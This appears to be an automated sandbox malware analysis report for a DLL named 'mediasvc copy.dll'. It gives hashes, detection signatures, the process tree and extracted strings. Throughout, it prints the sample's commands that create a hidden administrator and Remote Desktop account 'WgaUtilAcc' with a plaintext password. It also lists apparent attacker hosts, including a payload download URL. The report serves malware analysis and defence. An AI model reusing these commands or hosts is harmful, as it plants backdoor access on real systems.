Loading ...

Play interactive tourEdit tour

Analysis Report mediasvc copy.dll

Overview

General Information

Sample Name:mediasvc copy.dll
Analysis ID:326485
MD5:7be1e51fdc4a8174e82df8b2d6825f8e
SHA1:0e20003e34874d330db3b7ecd7f5824055645e3b
SHA256:6b6b820f47b2bf72296aa4ef031a80df04fb951ecf3accfed9bb0289373f45bc

Most interesting Screenshot:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Adds a new user with administrator rights
Hides user accounts
Modifies security policies related information
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Enables debug privileges
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
Queries disk information (often used to detect virtual machines)
Queries time zone information
Spawns drivers
Stores large binary data to the registry
Tries to load missing DLLs

Classification

Startup

  • System is w10x64
  • loaddll64.exe (PID: 7108 cmdline: loaddll64.exe 'C:\Users\user\Desktop\mediasvc copy.dll' MD5: 60CEF63D678C884BE51A4BDBC9FC1ED5)
    • rundll32.exe (PID: 7136 cmdline: rundll32.exe C:\Users\user\Desktop\mediasvc copy.dll,TMethodImplementationIntercept MD5: 73C519F050C20580F8A62C849D49215A)
    • cmd.exe (PID: 7164 cmdline: cmd /C net.exe user WgaUtilAcc 000000 /del MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • net.exe (PID: 1748 cmdline: net.exe user WgaUtilAcc 000000 /del MD5: 15534275EDAABC58159DD0F8607A71E5)
        • net1.exe (PID: 6224 cmdline: C:\Windows\system32\net1 user WgaUtilAcc 000000 /del MD5: AF569DE92AB6C1B9C681AF1E799F9983)
    • cmd.exe (PID: 1020 cmdline: cmd /C net.exe user WgaUtilAcc ph9ZVf2Q /add MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • net.exe (PID: 6344 cmdline: net.exe user WgaUtilAcc ph9ZVf2Q /add MD5: 15534275EDAABC58159DD0F8607A71E5)
        • net1.exe (PID: 2588 cmdline: C:\Windows\system32\net1 user WgaUtilAcc ph9ZVf2Q /add MD5: AF569DE92AB6C1B9C681AF1E799F9983)
    • cmd.exe (PID: 5908 cmdline: cmd /C net.exe LOCALGROUP 'Remote Desktop Users' WgaUtilAcc /ADD MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • net.exe (PID: 6048 cmdline: net.exe LOCALGROUP 'Remote Desktop Users' WgaUtilAcc /ADD MD5: 15534275EDAABC58159DD0F8607A71E5)
        • net1.exe (PID: 1808 cmdline: C:\Windows\system32\net1 LOCALGROUP 'Remote Desktop Users' WgaUtilAcc /ADD MD5: AF569DE92AB6C1B9C681AF1E799F9983)
    • rundll32.exe (PID: 5892 cmdline: rundll32.exe C:\Users\user\Desktop\mediasvc copy.dll,__dbk_fcall_wrapper MD5: 73C519F050C20580F8A62C849D49215A)
    • cmd.exe (PID: 5588 cmdline: cmd /C net.exe LOCALGROUP 'Remote Desktop Users' user /ADD MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • net.exe (PID: 5576 cmdline: net.exe LOCALGROUP 'Remote Desktop Users' user /ADD MD5: 15534275EDAABC58159DD0F8607A71E5)
        • net1.exe (PID: 6588 cmdline: C:\Windows\system32\net1 LOCALGROUP 'Remote Desktop Users' user /ADD MD5: AF569DE92AB6C1B9C681AF1E799F9983)
    • cmd.exe (PID: 6720 cmdline: cmd /C net.exe LOCALGROUP 'Administrators' WgaUtilAcc /ADD MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • net.exe (PID: 6392 cmdline: net.exe LOCALGROUP 'Administrators' WgaUtilAcc /ADD MD5: 15534275EDAABC58159DD0F8607A71E5)
        • net1.exe (PID: 6388 cmdline: C:\Windows\system32\net1 LOCALGROUP 'Administrators' WgaUtilAcc /ADD MD5: AF569DE92AB6C1B9C681AF1E799F9983)
    • rundll32.exe (PID: 6368 cmdline: rundll32.exe C:\Users\user\Desktop\mediasvc copy.dll,dbkFCallWrapperAddr MD5: 73C519F050C20580F8A62C849D49215A)
    • cmd.exe (PID: 6216 cmdline: cmd /C net.exe user WgaUtilAcc ph9ZVf2Q MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • net.exe (PID: 5604 cmdline: net.exe user WgaUtilAcc ph9ZVf2Q MD5: 15534275EDAABC58159DD0F8607A71E5)
        • net1.exe (PID: 5704 cmdline: C:\Windows\system32\net1 user WgaUtilAcc ph9ZVf2Q MD5: AF569DE92AB6C1B9C681AF1E799F9983)
    • rundll32.exe (PID: 6644 cmdline: rundll32.exe C:\Users\user\Desktop\mediasvc copy.dll,euefnaiw MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 6948 cmdline: rundll32.exe C:\Users\user\Desktop\mediasvc copy.dll,gusiezo3 MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 1748 cmdline: rundll32.exe C:\Users\user\Desktop\mediasvc copy.dll,hitit MD5: 73C519F050C20580F8A62C849D49215A)
    • WerFault.exe (PID: 6588 cmdline: C:\Windows\system32\WerFault.exe -u -p 7108 -s 1152 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
  • rdpdr.sys (PID: 4 cmdline: MD5: 52A6CC99F5934CFAE88353C47B6193E7)
  • tsusbhub.sys (PID: 4 cmdline: MD5: 3A84A09CBC42148A0C7D00B3E82517F1)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Group Modification LoggingShow sources
Source: Event LogsAuthor: Alexandr Yampolskyi, SOC Prime: Data: EventID: 4728, Source: Microsoft-Windows-Security-Auditing, data 0: -, data 1: S-1-5-21-3853321935-2125563209-4053062332-1003, data 2: None, data 3: computer, data 4: S-1-5-21-3853321935-2125563209-4053062332-513, data 5: S-1-5-21-3853321935-2125563209-4053062332-1002, data 6: user, data 7: computer, data 8: 0x2005f, data 9: -
Sigma detected: Local User CreationShow sources
Source: Event LogsAuthor: Patrick Bareiss: Data: EventID: 4720, Source: Microsoft-Windows-Security-Auditing, data 0: WgaUtilAcc, data 1: computer, data 10: -, data 11: %%1793, data 12: %%1793, data 13: %%1793, data 14: %%1793, data 15: %%1793, data 16: %%1794, data 17: %%1794, data 18: 513, data 19: -, data 2: S-1-5-21-3853321935-2125563209-4053062332-1003, data 20: 0x0, data 21: 0x15, data 22: %%2080 %%2082 %%2084, data 23: %%1793, data 24: -, data 25: %%1797, data 3: S-1-5-21-3853321935-2125563209-4053062332-1002, data 4: user, data 5: computer, data 6: 0x2005f, data 7: -, data 8: WgaUtilAcc, data 9: %%1793
Sigma detected: Net.exe ExecutionShow sources
Source: Process startedAuthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net.exe user WgaUtilAcc 000000 /del, CommandLine: net.exe user WgaUtilAcc 000000 /del, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: cmd /C net.exe user WgaUtilAcc 000000 /del, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7164, ProcessCommandLine: net.exe user WgaUtilAcc 000000 /del, ProcessId: 1748

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus / Scanner detection for submitted sampleShow sources
Source: mediasvc copy.dllAvira: detected
Multi AV Scanner detection for submitted fileShow sources
Source: mediasvc copy.dllVirustotal: Detection: 60%Perma Link
Source: mediasvc copy.dllMetadefender: Detection: 27%Perma Link
Source: mediasvc copy.dllReversingLabs: Detection: 45%
Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: unknownDNS traffic detected: queries for: hitnaiguat.xyz
Source: loaddll64.exe, 00000000.00000002.784618390.0000025BFD9BC000.00000004.00000020.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: loaddll64.exe, 00000000.00000003.708761089.0000025BFDC6A000.00000004.00000001.sdmpString found in binary or memory: http://bromide.xyz/ssh.zip
Source: loaddll64.exe, 00000000.00000002.784618390.0000025BFD9BC000.00000004.00000020.sdmpString found in binary or memory: http://cert.int-x3.letsencrypt.org/0-
Source: loaddll64.exe, 00000000.00000002.784618390.0000025BFD9BC000.00000004.00000020.sdmpString found in binary or memory: http://cps.letsencrypt.org0
Source: loaddll64.exe, 00000000.00000002.784618390.0000025BFD9BC000.00000004.00000020.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: loaddll64.exe, 00000000.00000002.784618390.0000025BFD9BC000.00000004.00000020.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: WerFault.exe, 00000023.00000002.780388618.000001E8D444E000.00000004.00000020.sdmpString found in binary or memory: http://crl.micro
Source: WerFault.exe, 00000023.00000003.724805687.000001E8D4487000.00000004.00000001.sdmpString found in binary or memory: http://isrg.trustid.ocsp.identru
Source: loaddll64.exe, 00000000.00000002.784618390.0000025BFD9BC000.00000004.00000020.sdmpString found in binary or memory: http://isrg.trustid.ocsp.identrust.com0;
Source: loaddll64.exe, 00000000.00000002.784618390.0000025BFD9BC000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.int-x3.letsencrypt.org0/
Source: loaddll64.exe, 00000000.00000003.708761089.0000025BFDC6A000.00000004.00000001.sdmpString found in binary or memory: http://sdsddgu.xyz/khkhkt
Source: loaddll64.exe, 00000000.00000002.784706857.0000025BFD9E3000.00000004.00000020.sdmpString found in binary or memory: https://hitnaiguat.xyz/
Source: loaddll64.exe, 00000000.00000002.784344742.0000025BFD982000.00000004.00000020.sdmp, loaddll64.exe, 00000000.00000002.784753875.0000025BFD9FC000.00000004.00000020.sdmpString found in binary or memory: https://hitnaiguat.xyz/ctp/b.php
Source: loaddll64.exe, 00000000.00000003.708751537.0000025BFDC63000.00000004.00000001.sdmpString found in binary or memory: https://hitnaiguat.xyz/ctp/b.php03
Source: loaddll64.exe, 00000000.00000002.784344742.0000025BFD982000.00000004.00000020.sdmpString found in binary or memory: https://hitnaiguat.xyz/ctp/b.phpt
Source: loaddll64.exe, 00000000.00000003.708751537.0000025BFDC63000.00000004.00000001.sdmpString found in binary or memory: https://hitnaiguat.xyzdfdlhldfh03
Source: loaddll64.exe, 00000000.00000002.784618390.0000025BFD9BC000.00000004.00000020.sdmpString found in binary or memory: https://watnaiguat.xyz/
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7108 -s 1152
Source: mediasvc copy.dllStatic PE information: Resource name: RT_STRING type: COM executable for DOS
Source: unknownDriver loaded: C:\Windows\System32\drivers\rdpvideominiport.sys
Source: C:\Windows\System32\WerFault.exeSection loaded: sfc.dll
Source: C:\Windows\System32\WerFault.exeSection loaded: phoneinfo.dll
Source: C:\Windows\System32\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
Source: C:\Windows\System32\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
Source: C:\Windows\System32\WerFault.exeSection loaded: cryptnet.dll
Source: mediasvc copy.dllStatic PE information: Section: UPX1 ZLIB complexity 0.999005776263
Source: classification engineClassification label: mal68.evad.winDLL@50/5@1/1
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7108
Source: C:\Windows\System32\loaddll64.exeFile created: C:\Users\user\AppData\Local\Temp\FPIXLWRMJump to behavior
Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\loaddll64.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\loaddll64.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\mediasvc copy.dll,TMethodImplementationIntercept
Source: mediasvc copy.dllVirustotal: Detection: 60%
Source: mediasvc copy.dllMetadefender: Detection: 27%
Source: mediasvc copy.dllReversingLabs: Detection: 45%
Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe 'C:\Users\user\Desktop\mediasvc copy.dll'
Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\mediasvc copy.dll,TMethodImplementationIntercept
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /C net.exe user WgaUtilAcc 000000 /del
Source: unknownProcess created: C:\Windows\System32\net.exe net.exe user WgaUtilAcc 000000 /del
Source: unknownProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /C net.exe user WgaUtilAcc ph9ZVf2Q /add
Source: unknownProcess created: C:\Windows\System32\net.exe net.exe user WgaUtilAcc ph9ZVf2Q /add
Source: unknownProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user WgaUtilAcc ph9ZVf2Q /add
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /C net.exe LOCALGROUP 'Remote Desktop Users' WgaUtilAcc /ADD
Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\mediasvc copy.dll,__dbk_fcall_wrapper
Source: unknownProcess created: C:\Windows\System32\net.exe net.exe LOCALGROUP 'Remote Desktop Users' WgaUtilAcc /ADD
Source: unknownProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 LOCALGROUP 'Remote Desktop Users' WgaUtilAcc /ADD
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /C net.exe LOCALGROUP 'Remote Desktop Users' user /ADD
Source: unknownProcess created: C:\Windows\System32\net.exe net.exe LOCALGROUP 'Remote Desktop Users' user /ADD
Source: unknownProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 LOCALGROUP 'Remote Desktop Users' user /ADD
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /C net.exe LOCALGROUP 'Administrators' WgaUtilAcc /ADD
Source: unknownProcess created: C:\Windows\System32\net.exe net.exe LOCALGROUP 'Administrators' WgaUtilAcc /ADD
Source: unknownProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 LOCALGROUP 'Administrators' WgaUtilAcc /ADD
Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\mediasvc copy.dll,dbkFCallWrapperAddr
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /C net.exe user WgaUtilAcc ph9ZVf2Q
Source: unknownProcess created: C:\Windows\System32\net.exe net.exe user WgaUtilAcc ph9ZVf2Q
Source: unknownProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user WgaUtilAcc ph9ZVf2Q
Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\mediasvc copy.dll,euefnaiw
Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\mediasvc copy.dll,gusiezo3
Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\mediasvc copy.dll,hitit
Source: unknownProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7108 -s 1152
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\mediasvc copy.dll,TMethodImplementationIntercept
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd /C net.exe user WgaUtilAcc 000000 /del
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd /C net.exe user WgaUtilAcc ph9ZVf2Q /add
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd /C net.exe LOCALGROUP 'Remote Desktop Users' WgaUtilAcc /ADD
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\mediasvc copy.dll,__dbk_fcall_wrapper
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd /C net.exe LOCALGROUP 'Remote Desktop Users' user /ADD
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd /C net.exe LOCALGROUP 'Administrators' WgaUtilAcc /ADD
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\mediasvc copy.dll,dbkFCallWrapperAddr
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd /C net.exe user WgaUtilAcc ph9ZVf2Q
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\mediasvc copy.dll,euefnaiw
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\mediasvc copy.dll,gusiezo3
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\net.exe net.exe user WgaUtilAcc 000000 /del
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net.exe user WgaUtilAcc 000000 /del
Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net.exe user WgaUtilAcc ph9ZVf2Q /add
Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user WgaUtilAcc ph9ZVf2Q /add
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net.exe LOCALGROUP 'Remote Desktop Users' WgaUtilAcc /ADD
Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 LOCALGROUP 'Remote Desktop Users' WgaUtilAcc /ADD
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net.exe LOCALGROUP 'Remote Desktop Users' user /ADD
Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 LOCALGROUP 'Remote Desktop Users' user /ADD
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net.exe LOCALGROUP 'Administrators' WgaUtilAcc /ADD
Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 LOCALGROUP 'Administrators' WgaUtilAcc /ADD
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net.exe user WgaUtilAcc ph9ZVf2Q
Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user WgaUtilAcc ph9ZVf2Q
Source: C:\Windows\System32\loaddll64.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\InProcServer32
Source: C:\Windows\System32\rundll32.exeAutomated click: OK
Source: C:\Windows\System32\rundll32.exeAutomated click: OK
Source: C:\Windows\System32\net.exeAutomated click: OK
Source: C:\Windows\System32\rundll32.exeAutomated click: OK
Source: C:\Windows\System32\rundll32.exeAutomated click: OK
Source: C:\Windows\System32\rundll32.exeAutomated click: OK
Source: C:\Windows\System32\rundll32.exeAutomated click: OK
Source: C:\Windows\System32\rundll32.exeAutomated click: OK
Source: C:\Windows\System32\rundll32.exeAutomated click: OK
Source: mediasvc copy.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: UxTheme.pdb source: WerFault.exe, 00000023.00000003.720913542.000001E8D6C7F000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000023.00000003.721203229.000001E8D6C7B000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000023.00000003.720965380.000001E8D6C76000.00000004.00000040.sdmp
Source: Binary string: wbemcomn.pdb source: WerFault.exe, 00000023.00000003.720913542.000001E8D6C7F000.00000004.00000040.sdmp
Source: Binary string: mskeyprotect.pdb source: WerFault.exe, 00000023.00000003.720930195.000001E8D6C8A000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb8 source: WerFault.exe, 00000023.00000003.720965380.000001E8D6C76000.00000004.00000040.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000023.00000003.720965380.000001E8D6C76000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdbXE source: WerFault.exe, 00000023.00000003.721203229.000001E8D6C7B000.00000004.00000040.sdmp
Source: Binary string: UxTheme.pdb$ source: WerFault.exe, 00000023.00000003.720913542.000001E8D6C7F000.00000004.00000040.sdmp
Source: Binary string: winnsi.pdb source: WerFault.exe, 00000023.00000003.720913542.000001E8D6C7F000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000023.00000003.720965380.000001E8D6C76000.00000004.00000040.sdmp
Source: Binary string: gdi32.pdb8 source: WerFault.exe, 00000023.00000003.720965380.000001E8D6C76000.00000004.00000040.sdmp
Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 00000023.00000003.720913542.000001E8D6C7F000.00000004.00000040.sdmp
Source: Binary string: schannel.pdb source: WerFault.exe, 00000023.00000003.720913542.000001E8D6C7F000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb9 source: WerFault.exe, 00000023.00000003.720913542.000001E8D6C7F000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000023.00000003.721203229.000001E8D6C7B000.00000004.00000040.sdmp
Source: Binary string: kernel32.pdb source: WerFault.exe, 00000023.00000003.720965380.000001E8D6C76000.00000004.00000040.sdmp
Source: Binary string: msvcrt.pdb8 source: WerFault.exe, 00000023.00000003.720965380.000001E8D6C76000.00000004.00000040.sdmp
Source: Binary string: sxs.pdb source: WerFault.exe, 00000023.00000003.720913542.000001E8D6C7F000.00000004.00000040.sdmp
Source: Binary string: ntdll.pdb8 source: WerFault.exe, 00000023.00000003.720965380.000001E8D6C76000.00000004.00000040.sdmp
Source: Binary string: win32u.pdb source: WerFault.exe, 00000023.00000003.721192200.000001E8D6C79000.00000004.00000040.sdmp
Source: Binary string: ntdll.pdb0 source: WerFault.exe, 00000023.00000003.715383654.000001E8D618C000.00000004.00000001.sdmp
Source: Binary string: dhcpcsvc.pdb6 source: WerFault.exe, 00000023.00000003.720913542.000001E8D6C7F000.00000004.00000040.sdmp
Source: Binary string: imm32.pdb source: WerFault.exe, 00000023.00000003.721203229.000001E8D6C7B000.00000004.00000040.sdmp
Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000023.00000003.720913542.000001E8D6C7F000.00000004.00000040.sdmp
Source: Binary string: kernelbase.pdb0 source: WerFault.exe, 00000023.00000003.716999614.000001E8D6198000.00000004.00000001.sdmp
Source: Binary string: winspool.pdb source: WerFault.exe, 00000023.00000003.721203229.000001E8D6C7B000.00000004.00000040.sdmp
Source: Binary string: mswsock.pdb source: WerFault.exe, 00000023.00000003.720913542.000001E8D6C7F000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000023.00000003.721203229.000001E8D6C7B000.00000004.00000040.sdmp
Source: Binary string: wbemdisp.pdb source: WerFault.exe, 00000023.00000003.720913542.000001E8D6C7F000.00000004.00000040.sdmp
Source: Binary string: kernelbase.pdb8 source: WerFault.exe, 00000023.00000003.720965380.000001E8D6C76000.00000004.00000040.sdmp
Source: Binary string: ncrypt.pdbw source: WerFault.exe, 00000023.00000003.720913542.000001E8D6C7F000.00000004.00000040.sdmp
Source: Binary string: nsi.pdb source: WerFault.exe, 00000023.00000003.720913542.000001E8D6C7F000.00000004.00000040.sdmp
Source: Binary string: imm32.pdb_E source: WerFault.exe, 00000023.00000003.721203229.000001E8D6C7B000.00000004.00000040.sdmp
Source: Binary string: webio.pdb source: WerFault.exe, 00000023.00000003.720913542.000001E8D6C7F000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb8 source: WerFault.exe, 00000023.00000003.720965380.000001E8D6C76000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 00000023.00000003.721203229.000001E8D6C7B000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdbTE source: WerFault.exe, 00000023.00000003.721203229.000001E8D6C7B000.00000004.00000040.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 00000023.00000003.721192200.000001E8D6C79000.00000004.00000040.sdmp
Source: Binary string: gdi32full.pdb8 source: WerFault.exe, 00000023.00000003.720965380.000001E8D6C76000.00000004.00000040.sdmp
Source: Binary string: rasadhlp.pdb/ source: WerFault.exe, 00000023.00000003.720913542.000001E8D6C7F000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdb source: WerFault.exe, 00000023.00000003.720913542.000001E8D6C7F000.00000004.00000040.sdmp
Source: Binary string: schannel.pdbi source: WerFault.exe, 00000023.00000003.720913542.000001E8D6C7F000.00000004.00000040.sdmp
Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000023.00000003.721241994.000001E8D6C70000.00000004.00000040.sdmp
Source: Binary string: ole32.pdb8 source: WerFault.exe, 00000023.00000003.721192200.000001E8D6C79000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000023.00000003.721203229.000001E8D6C7B000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000023.00000003.721241994.000001E8D6C70000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000023.00000003.721241994.000001E8D6C70000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdb8 source: WerFault.exe, 00000023.00000003.720965380.000001E8D6C76000.00000004.00000040.sdmp
Source: Binary string: ncrypt.pdb source: WerFault.exe, 00000023.00000003.720913542.000001E8D6C7F000.00000004.00000040.sdmp
Source: Binary string: kernel32.pdb8 source: WerFault.exe, 00000023.00000003.720965380.000001E8D6C76000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000023.00000003.720965380.000001E8D6C76000.00000004.00000040.sdmp
Source: Binary string: wbemprox.pdbj source: WerFault.exe, 00000023.00000003.720913542.000001E8D6C7F000.00000004.00000040.sdmp
Source: Binary string: rasadhlp.pdb source: WerFault.exe, 00000023.00000003.720913542.000001E8D6C7F000.00000004.00000040.sdmp
Source: Binary string: netutils.pdb source: WerFault.exe, 00000023.00000003.721203229.000001E8D6C7B000.00000004.00000040.sdmp
Source: Binary string: kernelbase.pdb source: WerFault.exe, 00000023.00000003.716999614.000001E8D6198000.00000004.00000001.sdmp
Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 00000023.00000003.720913542.000001E8D6C7F000.00000004.00000040.sdmp
Source: Binary string: rpcrt4.pdb source: WerFault.exe, 00000023.00000003.720965380.000001E8D6C76000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb8 source: WerFault.exe, 00000023.00000003.720965380.000001E8D6C76000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 00000023.00000003.721203229.000001E8D6C7B000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 00000023.00000003.721203229.000001E8D6C7B000.00000004.00000040.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 00000023.00000003.721203229.000001E8D6C7B000.00000004.00000040.sdmp
Source: Binary string: sspicli.pdb source: WerFault.exe, 00000023.00000003.720913542.000001E8D6C7F000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb.DLLB source: WerFault.exe, 00000023.00000003.721203229.000001E8D6C7B000.00000004.00000040.sdmp
Source: Binary string: loaddll64.pdb8 source: WerFault.exe, 00000023.00000003.721077963.000001E8D6C72000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdb@E source: WerFault.exe, 00000023.00000003.721203229.000001E8D6C7B000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000023.00000003.720965380.000001E8D6C76000.00000004.00000040.sdmp
Source: Binary string: sechost.pdb8 source: WerFault.exe, 00000023.00000003.720965380.000001E8D6C76000.00000004.00000040.sdmp
Source: Binary string: dnsapi.pdb source: WerFault.exe, 00000023.00000003.720913542.000001E8D6C7F000.00000004.00000040.sdmp
Source: Binary string: rpcrt4.pdb8 source: WerFault.exe, 00000023.00000003.720965380.000001E8D6C76000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc6.pdb< source: WerFault.exe, 00000023.00000003.720913542.000001E8D6C7F000.00000004.00000040.sdmp
Source: Binary string: shcore.pdbME source: WerFault.exe, 00000023.00000003.721203229.000001E8D6C7B000.00000004.00000040.sdmp
Source: Binary string: winhttp.pdb source: WerFault.exe, 00000023.00000003.721203229.000001E8D6C7B000.00000004.00000040.sdmp
Source: Binary string: ntasn1.pdb source: WerFault.exe, 00000023.00000003.720913542.000001E8D6C7F000.00000004.00000040.sdmp
